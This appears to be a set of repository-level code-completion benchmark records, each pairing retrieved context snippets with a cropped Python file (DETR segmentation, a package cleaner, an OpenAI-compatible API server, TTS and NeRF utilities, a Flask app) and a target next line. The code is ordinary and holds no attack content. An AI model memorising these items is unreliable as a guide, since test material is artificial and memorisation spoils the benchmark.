"snippet": "def interpolate(input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None):\n # type: (Tensor, Optional[List[int]], Optional[float], str, Optional[bool]) -> Tensor\n \"\"\"\n Equivalent to nn.functional.interpolate, but with support for empty batch sizes.\n This will eventually be supported natively by PyTorch, and this\n class can go away.\n \"\"\"\n if float(torchvision.__version__[:3]) < 0.7:\n if input.numel() > 0:\n return torch.nn.functional.interpolate(\n input, size, scale_factor, mode, align_corners\n )\n\n output_shape = _output_size(2, input, size, scale_factor)\n output_shape = list(input.shape[:-2]) + list(output_shape)\n if float(torchvision.__version__[:3]) < 0.5:\n return _NewEmptyTensorOp.apply(input, output_shape)\n return _new_empty_tensor(input, output_shape)\n else:\n return torchvision.ops.misc.interpolate(input, size, scale_factor, mode, align_corners)"
},
{
"identifier": "nested_tensor_from_tensor_list",
"path": "VisualSearch/model/owlvit/util/misc.py",
"snippet": "def nested_tensor_from_tensor_list(tensor_list: List[Tensor]):\n # TODO make this more general\n if tensor_list[0].ndim == 3:\n # TODO make it support different-sized images\n max_size = _max_by_axis([list(img.shape) for img in tensor_list])\n # min_size = tuple(min(s) for s in zip(*[img.shape for img in tensor_list]))\n batch_shape = [len(tensor_list)] + max_size\n b, c, h, w = batch_shape\n dtype = tensor_list[0].dtype\n device = tensor_list[0].device\n tensor = torch.zeros(batch_shape, dtype=dtype, device=device)\n mask = torch.ones((b, h, w), dtype=torch.bool, device=device)\n for img, pad_img, m in zip(tensor_list, tensor, mask):\n pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img)\n m[: img.shape[1], :img.shape[2]] = False\n else:\n raise ValueError('not supported')\n return NestedTensor(tensor, mask)"
}
] | import io
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import defaultdict
from PIL import Image
from .util import box_ops
from .util.misc import NestedTensor, interpolate, nested_tensor_from_tensor_list
from panopticapi.utils import id2rgb, rgb2id | 1,175 | # ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
This file provides the definition of the convolutional heads used to predict masks, as well as the losses
"""
try:
except ImportError:
pass
class DETRsegm(nn.Module):
def __init__(self, detr, freeze_detr=False):
super().__init__()
self.detr = detr
if freeze_detr:
for p in self.parameters():
p.requires_grad_(False)
hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead
self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0)
self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim)
def forward(self, samples: NestedTensor):
if not isinstance(samples, NestedTensor):
| # ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
This file provides the definition of the convolutional heads used to predict masks, as well as the losses
"""
try:
except ImportError:
pass
class DETRsegm(nn.Module):
def __init__(self, detr, freeze_detr=False):
super().__init__()
self.detr = detr
if freeze_detr:
for p in self.parameters():
p.requires_grad_(False)
hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead
self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0)
self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim)
def forward(self, samples: NestedTensor):
if not isinstance(samples, NestedTensor): | samples = nested_tensor_from_tensor_list(samples) | 3 | 2023-12-15 14:58:24+00:00 | 2k |
ValdonVitija/crap | crap/crap_manager.py | [
{
"identifier": "PythonFileAnalyzer",
"path": "crap/file_analyzer.py",
"snippet": "class PythonFileAnalyzer:\n def __init__(self, file_path: pathlib.Path):\n self.file_path = file_path\n self.imported_modules = set()\n\n def analyze(self):\n \"\"\"\n Analyzes the Python file and extracts the imported modules.\n \"\"\"\n code = self.file_path.read_text()\n tree = ast.parse(code)\n visitor = ImportsVisitor()\n visitor.visit(tree)\n self.imported_modules = visitor.imported_modules"
},
{
"identifier": "VirtualEnvChecker",
"path": "crap/virtual_env_checker.py",
"snippet": "class VirtualEnvChecker:\n def __init__(self):\n self.venv_indicators = {\n \"linux\": {\"bin\", \"include\", \"lib\", \"pyvenv.cfg\"},\n \"win32\": {\"Scripts\", \"Include\", \"Lib\", \"pyvenv.cfg\"}\n }\n\n def is_likely_venv(self, path):\n \"\"\"\n Checks if the given path is likely to be a virtual environment.\n \n Args:\n path (str): The path to check.\n\n Returns:\n bool: True if the path is likely to be a virtual environment, False otherwise.\n \"\"\"\n platform = sys.platform\n indicators = self.venv_indicators.get(platform, set())\n return all(os.path.exists(os.path.join(path, ind)) for ind in indicators)"
},
{
"identifier": "PackageUsageCounter",
"path": "crap/package_usage_counter.py",
"snippet": "class PackageUsageCounter:\n def __init__(self):\n self.pack_counter = get_package_counter_dict()\n\n def increment_package_count(self, package):\n if package in self.pack_counter:\n self.pack_counter[package] += 1\n\n def get_unused_packages(self, important_packages) -> List[str]:\n \"\"\"\n Returns a list of unused packages.\n\n A package is considered unused if its count is 0 and it is not in the list of important packages.\n \n Args:\n important_packages (List[str]): A list of important packages.\n\n Returns:\n List[str]: A list of unused packages.\n \"\"\"\n return [pkg for pkg, count in self.pack_counter.items() if count == 0 and pkg not in important_packages]"
},
{
"identifier": "uninstall_package",
"path": "crap/subprocesses.py",
"snippet": "def uninstall_package(package_name: str):\n \"\"\"Uninstall a given package.\"\"\"\n execute_command_without_output([\"pip3\", \"uninstall\", \"-y\", package_name])"
},
{
"identifier": "pre_cleanup_with_ruff",
"path": "crap/subprocesses.py",
"snippet": "def pre_cleanup_with_ruff(path_):\n \"\"\"\n Pre cleanup with ruff\n \"\"\"\n execute_command_without_output([\"ruff\", \"check\", path_, \"--fix\"])"
},
{
"identifier": "reinstall_from_requirements",
"path": "crap/subprocesses.py",
"snippet": "def reinstall_from_requirements() -> None:\n \"\"\"Reinstall packages from requirements.txt.\"\"\"\n req_path = pathlib.Path(__file__).parent / \"data\" / \"req.txt\"\n execute_command_without_output(\n [\"pip3\", \"install\", \"-r\", req_path, \"--no-cache-dir\"]\n )"
},
{
"identifier": "freeze_into_requirements",
"path": "crap/subprocesses.py",
"snippet": "def freeze_into_requirements():\n \"\"\"Freeze current environment to requirements.txt.\"\"\"\n req_path = pathlib.Path(__file__).parent / \"data\" / \"req.txt\"\n try:\n with open(req_path, \"w\") as file_:\n subprocess.run([\"pip3\", \"freeze\"], stdout=file_)\n except Exception as ex:\n print(ex)"
},
{
"identifier": "get_current_packages",
"path": "crap/subprocesses.py",
"snippet": "def get_current_packages() -> set:\n \"\"\"Get the current packages installed in the environment.\"\"\"\n process = subprocess.run([\"pip3\", \"freeze\"], capture_output=True, text=True)\n output = process.stdout.strip()\n packages = set(line.split(\"==\")[0] for line in output.split(\"\\n\"))\n return packages"
}
] | import os
import pathlib
from typing import Set
from tqdm import tqdm
from crap.file_analyzer import PythonFileAnalyzer
from crap.virtual_env_checker import VirtualEnvChecker
from crap.package_usage_counter import PackageUsageCounter
from crap.subprocesses import (
uninstall_package,
pre_cleanup_with_ruff,
reinstall_from_requirements,
freeze_into_requirements,
get_current_packages
) | 1,101 |
class CrapManager:
__slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages")
def __init__(self, path_: str):
self.path_ = pathlib.Path(path_).absolute()
self.venv_checker = VirtualEnvChecker()
self.package_usage_counter = PackageUsageCounter()
self.deleted_packages = set()
def run(self):
if not self.path_.exists():
raise FileNotFoundError("File/Dir not found")
total_steps = 4
bar_width = 100
bar_color = 'red'
with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar:
self._process_path()
pbar.update(1)
|
class CrapManager:
__slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages")
def __init__(self, path_: str):
self.path_ = pathlib.Path(path_).absolute()
self.venv_checker = VirtualEnvChecker()
self.package_usage_counter = PackageUsageCounter()
self.deleted_packages = set()
def run(self):
if not self.path_.exists():
raise FileNotFoundError("File/Dir not found")
total_steps = 4
bar_width = 100
bar_color = 'red'
with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar:
self._process_path()
pbar.update(1)
| initial_packages = get_current_packages() | 7 | 2023-12-19 20:22:37+00:00 | 2k |
worm128/AI-YinMei | text-generation-webui/extensions/openai/script.py | [
{
"identifier": "ChatCompletionRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ChatCompletionRequest(GenerationOptions, ChatCompletionRequestParams):\n pass"
},
{
"identifier": "ChatCompletionResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ChatCompletionResponse(BaseModel):\n id: str\n choices: List[dict]\n created: int = int(time.time())\n model: str\n object: str = \"chat.completion\"\n usage: dict"
},
{
"identifier": "CompletionRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class CompletionRequest(GenerationOptions, CompletionRequestParams):\n pass"
},
{
"identifier": "CompletionResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class CompletionResponse(BaseModel):\n id: str\n choices: List[dict]\n created: int = int(time.time())\n model: str\n object: str = \"text_completion\"\n usage: dict"
},
{
"identifier": "DecodeRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class DecodeRequest(BaseModel):\n tokens: List[int]"
},
{
"identifier": "DecodeResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class DecodeResponse(BaseModel):\n text: str"
},
{
"identifier": "EmbeddingsRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EmbeddingsRequest(BaseModel):\n input: str | List[str]\n model: str | None = Field(default=None, description=\"Unused parameter. To change the model, set the OPENEDAI_EMBEDDING_MODEL and OPENEDAI_EMBEDDING_DEVICE environment variables before starting the server.\")\n encoding_format: str = Field(default=\"float\", description=\"Can be float or base64.\")\n user: str | None = Field(default=None, description=\"Unused parameter.\")"
},
{
"identifier": "EmbeddingsResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EmbeddingsResponse(BaseModel):\n index: int\n embedding: List[float]\n object: str = \"embedding\""
},
{
"identifier": "EncodeRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EncodeRequest(BaseModel):\n text: str"
},
{
"identifier": "EncodeResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EncodeResponse(BaseModel):\n tokens: List[int]\n length: int"
},
{
"identifier": "LoadLorasRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoadLorasRequest(BaseModel):\n lora_names: List[str]"
},
{
"identifier": "LoadModelRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoadModelRequest(BaseModel):\n model_name: str\n args: dict | None = None\n settings: dict | None = None"
},
{
"identifier": "LogitsRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LogitsRequest(GenerationOptions, LogitsRequestParams):\n pass"
},
{
"identifier": "LogitsResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LogitsResponse(BaseModel):\n logits: dict"
},
{
"identifier": "LoraListResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoraListResponse(BaseModel):\n lora_names: List[str]"
},
{
"identifier": "ModelInfoResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ModelInfoResponse(BaseModel):\n model_name: str\n lora_names: List[str]"
},
{
"identifier": "ModelListResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ModelListResponse(BaseModel):\n model_names: List[str]"
},
{
"identifier": "TokenCountResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class TokenCountResponse(BaseModel):\n length: int"
},
{
"identifier": "to_dict",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "def to_dict(obj):\n return obj.__dict__"
}
] | import asyncio
import json
import os
import traceback
import speech_recognition as sr
import uvicorn
import extensions.openai.completions as OAIcompletions
import extensions.openai.embeddings as OAIembeddings
import extensions.openai.images as OAIimages
import extensions.openai.logits as OAIlogits
import extensions.openai.models as OAImodels
import extensions.openai.moderations as OAImoderations
from threading import Thread
from fastapi import Depends, FastAPI, Header, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from fastapi.requests import Request
from fastapi.responses import JSONResponse
from pydub import AudioSegment
from sse_starlette import EventSourceResponse
from extensions.openai.errors import ServiceUnavailableError
from extensions.openai.tokens import token_count, token_decode, token_encode
from extensions.openai.utils import _start_cloudflared
from modules import shared
from modules.logging_colors import logger
from modules.models import unload_model
from modules.text_generation import stop_everything_event
from .typing import (
ChatCompletionRequest,
ChatCompletionResponse,
CompletionRequest,
CompletionResponse,
DecodeRequest,
DecodeResponse,
EmbeddingsRequest,
EmbeddingsResponse,
EncodeRequest,
EncodeResponse,
LoadLorasRequest,
LoadModelRequest,
LogitsRequest,
LogitsResponse,
LoraListResponse,
ModelInfoResponse,
ModelListResponse,
TokenCountResponse,
to_dict
) | 1,543 |
params = {
'embedding_device': 'cpu',
'embedding_model': 'sentence-transformers/all-mpnet-base-v2',
'sd_webui_url': '',
'debug': 0
}
streaming_semaphore = asyncio.Semaphore(1)
def verify_api_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.api_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
def verify_admin_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.admin_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
app = FastAPI()
check_key = [Depends(verify_api_key)]
check_admin_key = [Depends(verify_admin_key)]
# Configure CORS settings to allow all origins, methods, and headers
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
@app.options("/", dependencies=check_key)
async def options_route():
return JSONResponse(content="OK")
@app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key)
async def openai_completions(request: Request, request_data: CompletionRequest):
path = request.url.path
is_legacy = "/generate" in path
if request_data.stream:
async def generator():
async with streaming_semaphore:
response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy)
for resp in response:
disconnected = await request.is_disconnected()
if disconnected:
break
yield {"data": json.dumps(resp)}
return EventSourceResponse(generator()) # SSE streaming
else:
response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy)
return JSONResponse(response)
|
params = {
'embedding_device': 'cpu',
'embedding_model': 'sentence-transformers/all-mpnet-base-v2',
'sd_webui_url': '',
'debug': 0
}
streaming_semaphore = asyncio.Semaphore(1)
def verify_api_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.api_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
def verify_admin_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.admin_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
app = FastAPI()
check_key = [Depends(verify_api_key)]
check_admin_key = [Depends(verify_admin_key)]
# Configure CORS settings to allow all origins, methods, and headers
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
@app.options("/", dependencies=check_key)
async def options_route():
return JSONResponse(content="OK")
@app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key)
async def openai_completions(request: Request, request_data: CompletionRequest):
path = request.url.path
is_legacy = "/generate" in path
if request_data.stream:
async def generator():
async with streaming_semaphore:
response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy)
for resp in response:
disconnected = await request.is_disconnected()
if disconnected:
break
yield {"data": json.dumps(resp)}
return EventSourceResponse(generator()) # SSE streaming
else:
response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy)
return JSONResponse(response)
| @app.post('/v1/chat/completions', response_model=ChatCompletionResponse, dependencies=check_key) | 1 | 2023-12-20 14:13:38+00:00 | 2k |
foocker/Bert-VITS2-Faster | infer_torch_export_onnx.py | [
{
"identifier": "infer",
"path": "infer_.py",
"snippet": "def get_net_g(model_path: str, version: str, device: str, hps):\ndef get_text(text, language_str, hps, device):\ndef infer(\n text,\n sdp_ratio,\n noise_scale,\n noise_scale_w,\n length_scale,\n language,\n sid,\n hps,\n net_g,\n device,\n skip_start=False,\n skip_end=False,\n g_model_name=None\n):"
},
{
"identifier": "config",
"path": "config.py",
"snippet": "class Resample_config:\nclass Preprocess_text_config:\nclass Bert_gen_config:\nclass Emo_gen_config:\nclass Train_ms_config:\nclass Webui_config:\nclass Server_config:\nclass Translate_config:\nclass Config:\n def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n transcription_path: str,\n cleaned_path: str,\n train_path: str,\n val_path: str,\n config_path: str,\n val_per_spk: int = 5,\n max_val_total: int = 10000,\n clean: bool = True,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n env: Dict[str, any],\n base: Dict[str, any],\n model: str,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n device: str,\n model: str,\n config_path: str,\n language_identification_library: str,\n port: int = 7860,\n share: bool = False,\n debug: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self, models: List[Dict[str, any]], port: int = 5000, device: str = \"cuda\"\n ):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, app_key: str, secret_key: str):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, config_path: str):"
}
] | import os
import logging
import re_matching
import torch
import utils
import gradio as gr
import numpy as np
import time
from infer_ import infer, latest_version, get_net_g
from config import config
from scipy.io.wavfile import write | 940 |
logging.basicConfig(
level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s"
)
logger = logging.getLogger(__name__)
net_g = None
device = config.webui_config.device
if device == "mps":
os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1"
def generate_audio(
slices,
sdp_ratio,
noise_scale,
noise_scale_w,
length_scale,
speaker,
language,
skip_start=False,
skip_end=False,
):
audio_list = []
# silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16)
with torch.no_grad():
for idx, piece in enumerate(slices):
skip_start = (idx != 0) and skip_start
skip_end = (idx != len(slices) - 1) and skip_end
|
logging.basicConfig(
level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s"
)
logger = logging.getLogger(__name__)
net_g = None
device = config.webui_config.device
if device == "mps":
os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1"
def generate_audio(
slices,
sdp_ratio,
noise_scale,
noise_scale_w,
length_scale,
speaker,
language,
skip_start=False,
skip_end=False,
):
audio_list = []
# silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16)
with torch.no_grad():
for idx, piece in enumerate(slices):
skip_start = (idx != 0) and skip_start
skip_end = (idx != len(slices) - 1) and skip_end | audio = infer( | 0 | 2023-12-18 09:53:41+00:00 | 2k |
sinoyou/nelf-pro | nerfstudio/process_data/process_data_utils.py | [
{
"identifier": "status",
"path": "nerfstudio/utils/rich_utils.py",
"snippet": "def status(msg: str, spinner: str = \"bouncingBall\", verbose: bool = False):\n \"\"\"A context manager that does nothing is verbose is True. Otherwise it hides logs under a message.\n\n Args:\n msg: The message to log.\n spinner: The spinner to use.\n verbose: If True, print all logs, else hide them.\n \"\"\"\n if verbose:\n return nullcontext()\n return CONSOLE.status(msg, spinner=spinner)"
},
{
"identifier": "run_command",
"path": "nerfstudio/utils/scripts.py",
"snippet": "def run_command(cmd: str, verbose=False) -> Optional[str]:\n \"\"\"Runs a command and returns the output.\n\n Args:\n cmd: Command to run.\n verbose: If True, logs the output of the command.\n Returns:\n The output of the command if return_output is True, otherwise None.\n \"\"\"\n out = subprocess.run(cmd, capture_output=not verbose, shell=True, check=False)\n if out.returncode != 0:\n CONSOLE.rule(\"[bold red] :skull: :skull: :skull: ERROR :skull: :skull: :skull: \", style=\"red\")\n CONSOLE.print(f\"[bold red]Error running command: {cmd}\")\n CONSOLE.rule(style=\"red\")\n CONSOLE.print(out.stderr.decode(\"utf-8\"))\n sys.exit(1)\n if out.stdout is not None:\n return out.stdout.decode(\"utf-8\")\n return out"
}
] | import shutil
import sys
from enum import Enum
from pathlib import Path
from typing import List, Optional, Tuple
from rich.console import Console
from typing_extensions import Literal
from nerfstudio.utils.rich_utils import status
from nerfstudio.utils.scripts import run_command | 884 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper utils for processing data into the nerfstudio format."""
CONSOLE = Console(width=120)
class CameraModel(Enum):
"""Enum for camera types."""
OPENCV = "OPENCV"
OPENCV_FISHEYE = "OPENCV_FISHEYE"
CAMERA_MODELS = {
"perspective": CameraModel.OPENCV,
"fisheye": CameraModel.OPENCV_FISHEYE,
}
def get_num_frames_in_video(video: Path) -> int:
"""Returns the number of frames in a video.
Args:
video: Path to a video.
Returns:
The number of frames in a video.
"""
cmd = f"ffprobe -v error -select_streams v:0 -count_packets \
-show_entries stream=nb_read_packets -of csv=p=0 {video}"
output = run_command(cmd)
assert output is not None
output = output.strip(" ,\t\n\r")
return int(output)
def convert_video_to_images(
video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False
) -> Tuple[List[str], int]:
"""Converts a video into a sequence of images.
Args:
video_path: Path to the video.
output_dir: Path to the output directory.
num_frames_target: Number of frames to extract.
verbose: If True, logs the output of the command.
Returns:
A tuple containing summary of the conversion and the number of extracted frames.
"""
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper utils for processing data into the nerfstudio format."""
CONSOLE = Console(width=120)
class CameraModel(Enum):
"""Enum for camera types."""
OPENCV = "OPENCV"
OPENCV_FISHEYE = "OPENCV_FISHEYE"
CAMERA_MODELS = {
"perspective": CameraModel.OPENCV,
"fisheye": CameraModel.OPENCV_FISHEYE,
}
def get_num_frames_in_video(video: Path) -> int:
"""Returns the number of frames in a video.
Args:
video: Path to a video.
Returns:
The number of frames in a video.
"""
cmd = f"ffprobe -v error -select_streams v:0 -count_packets \
-show_entries stream=nb_read_packets -of csv=p=0 {video}"
output = run_command(cmd)
assert output is not None
output = output.strip(" ,\t\n\r")
return int(output)
def convert_video_to_images(
video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False
) -> Tuple[List[str], int]:
"""Converts a video into a sequence of images.
Args:
video_path: Path to the video.
output_dir: Path to the output directory.
num_frames_target: Number of frames to extract.
verbose: If True, logs the output of the command.
Returns:
A tuple containing summary of the conversion and the number of extracted frames.
"""
| with status(msg="Converting video to images...", spinner="bouncingBall", verbose=verbose): | 0 | 2023-12-15 20:07:22+00:00 | 2k |
wuc9521/rep-flow | app.py | [
{
"identifier": "read_keywords_from_file",
"path": "utils/loader.py",
"snippet": "def read_keywords_from_file(file_path, app: Flask = None):\n try:\n with open(file_path, 'r') as file:\n content = file.read()\n keywords_list = [keyword.strip() for keyword in re.split(',|\\n', content) if keyword.strip()]\n app.logger.info(f\"Keywords loaded: {keywords_list}\")\n return keywords_list\n\n except FileNotFoundError:\n app.logger.info(f\"Error: File '{file_path}' not found.\")\n return []"
},
{
"identifier": "HELP",
"path": "utils/hints.py",
"snippet": "HELP = get_HELP_HINT()"
},
{
"identifier": "get_NUMBER_EMBD_HINT",
"path": "utils/hints.py",
"snippet": "def get_NUMBER_EMBD_HINT(id):\n return f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launching...</span></li> \n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launched...</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "get_CURRENT_STATE_HINT",
"path": "utils/hints.py",
"snippet": "def get_CURRENT_STATE_HINT(id):\n return \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> \n </ul>\n \"\"\" if int(id) >= 0 else \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>No test launched</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "get_NEXT_STEP_HINT",
"path": "utils/hints.py",
"snippet": "def get_NEXT_STEP_HINT(id):\n return \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "extract_and_validate_test_number",
"path": "utils/test.py",
"snippet": "def extract_and_validate_test_number(query_text, app):\n \"\"\"\n refer to: https://regex101.com/r/x609CD/1\n \"\"\"\n match = re.match(r'\\/?test (\\d+)$', query_text)\n app.logger.info(f\"query_text: {query_text}\")\n if match:\n test_number = match.group(1)\n if test_number.isdigit():\n return test_number\n return None"
},
{
"identifier": "log_",
"path": "utils/log.py",
"snippet": "def log_(logger, level, message):\n cf = inspect.currentframe()\n caller_frame = cf.f_back\n caller_info = inspect.getframeinfo(caller_frame)\n log_message = f\"{caller_info.filename}:{caller_info.lineno} - {message}\"\n if level == 'info':\n logger.info(log_message)\n elif level == 'error':\n logger.error(log_message)\n elif level == 'warning':\n logger.warning(log_message)\n elif level == 'debug':\n logger.debug(log_message)\n else:\n raise ValueError(f\"Unsupported log level: {level}\")"
},
{
"identifier": "get_i",
"path": "utils/file.py",
"snippet": "def get_i(id, i):\n LIST_DIR = os.path.join(os.path.dirname(__file__), '../data/list')\n i = int(i)\n try:\n with open(os.path.join(LIST_DIR, str(id)+'.json'),'r') as f:\n data = json.load(f)\n if 0 <= i < len(data):\n return data[i]['guidance']+'.png', i==len(data)-1\n else:\n return f\"Index {i} is out of range.\"\n except Exception as e:\n return str(e)"
},
{
"identifier": "imgs",
"path": "model/common.py",
"snippet": "TEST_DIR = []\nDATA_DIR = os.path.join(os.path.dirname(__file__), '../data')\nLIST_DIR = os.path.join(DATA_DIR, 'list')"
},
{
"identifier": "image_process",
"path": "model/process.py",
"snippet": "def image_process(image_user_path, image_list, app=None):\n \"\"\"\n img_user_path: absolute path of user image\n img_list: list of guidance img\n \"\"\"\n print(TEST_DIR)\n image_user = io.imread(image_user_path)\n max_score = 0\n max_similar = 0\n for i in range(len(image_list)):\n if app: app.logger.info(f\"Calculating Similarity: image {i}\")\n score = classify_hist_with_split(image_user, image_list[i])\n if score > max_score:\n max_score = score\n max_similar = i\n if max_score < 0.7:\n return None\n\n return max_similar, max_score"
}
] | import os
import spacy
import logging
import pandas as pd
from logging.handlers import RotatingFileHandler
from flask import Flask, render_template, request, jsonify, send_from_directory
from flask_cors import cross_origin
from utils.loader import read_keywords_from_file
from utils.hints import HELP, get_NUMBER_EMBD_HINT, get_CURRENT_STATE_HINT, get_NEXT_STEP_HINT
from utils.test import extract_and_validate_test_number
from utils.log import log_
from utils.file import get_i
from model.common import imgs
from model.process import image_process | 1,501 |
DEFAULT_RESPONSE_FLAG = "*"
NUMBER_EMBD_HINT = None
CURRENT_BUG_ID = -1
# Load spaCy English model
nlp = spacy.load("en_core_web_sm")
app = Flask(__name__, template_folder='')
# Configure
LOG_DIR = os.path.join(app.root_path, 'log')
DATA_DIR = os.path.join(app.root_path, 'data')
MODEL_DIR = os.path.join(app.root_path, 'model')
CORPUS_DIR = os.path.join(DATA_DIR, 'corpus')
GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance')
STATE_DIR = os.path.join(DATA_DIR, 'state')
std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv'))
df = pd.merge(
pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')),
std,
on='ID',
how='left'
)
qa = dict(zip(df['Q'], df['A']))
at = dict(zip(std['A'], std['TYPE']))
ta = dict(zip(std['TYPE'], std['A']))
|
DEFAULT_RESPONSE_FLAG = "*"
NUMBER_EMBD_HINT = None
